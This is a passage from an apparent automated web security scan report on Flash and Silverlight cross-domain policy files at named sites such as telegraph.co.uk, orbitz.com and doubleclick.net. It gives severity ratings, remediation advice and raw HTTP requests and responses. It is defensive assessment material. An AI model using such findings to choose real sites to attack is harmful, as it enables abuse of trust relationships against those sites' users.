ETag: W/"1150-1304607406000"
Last-Modified: Thu, 05 May 2011 14:56:46 GMT
Content-Length: 1150
Content-Type: application/xml
Date: Mon, 16 May 2011 01:19:33 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="telegraph.co.uk"/>
<allow-access-from domain="*.telegraph.co.uk"/>
<allow-access-from domain="telegraphquiz.cfmx.flarecreative.com"/>
<allow-access-from domain="213.187.32.58"/>
<allow-access-from domain="213.187.48.185"/>
<allow-access-from domain="tgquiz.pavo.flarecreative.com"/>
<allow-access-from domain="ad.uk.doubleclick.net"/>
<allow-access-from domain="st.sand.msn-int.com" secure="true"/>
<allow-access-from domain="*.msn.com" secure="true"/>
<allow-access-from domain="services.brightcove.com"/>
<allow-access-from domain="admin.brightcove.com"/>
<allow-access-from domain="*.videoegg.com"/>
<allow-access-from domain="*.bebo.com"/>
<allow-access-from domain="*.hi5.com"/>
<allow-access-from domain="*.wayn.com"/>
<allow-access-from domain="*.tagged.com"/>
<allow-access-from domain="*.ringo.com"/>
<allow-access-from domain="dailytelegraph.accuweather.com"/>
<allow-access-from domain="skin.issuu.com" />
<allow-access-from domain="static.issuu.com" />
<allow-access-from domain="bestbuys.tmg.s3.amazonaws.com" />
<allow-access-from domain="*.washingtonpost.com" />
...[SNIP]...

6.86. http://www.orbitz.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.orbitz.com

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 11 May 2011 17:00:39 GMT
ETag: "2b8-4a30303185bc0"
Content-Type: text/xml
Content-Length: 696
Server: Apache
Date: Mon, 16 May 2011 01:29:50 GMT
Age: 13611
Connection: keep-alive
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

<cross-domain-policy>
   <allow-access-from domain="media.pointroll.com"/>
   <allow-access-from domain="www.pointroll.com"/>
   <allow-access-from domain="submit.pointroll.com"/>
   <allow-access-from domain="data.pointroll.com"/>
   <allow-access-from domain="speed.pointroll.com"/>
   <allow-access-from domain="mirror.pointroll.com"/>
   <allow-access-from domain="mx.pointroll.com"/>
   <allow-access-from domain="geo.pointroll.com"/>
   <allow-access-from domain="ll.pointroll.com"/>
   <allow-access-from domain="clk.pointroll.com"/>
   <allow-access-from domain="clients.pointroll.com"/>
   <allow-access-from domain="fdaf.pointroll.com"/>
   <allow-access-from domain="demo.pointroll.net"/>
...[SNIP]...

7. Silverlight cross-domain policy
There are 14 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged-in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

7.1. http://ad-emea.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Mon, 14 Apr 2008 15:50:56 GMT
Date: Mon, 16 May 2011 01:19:40 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...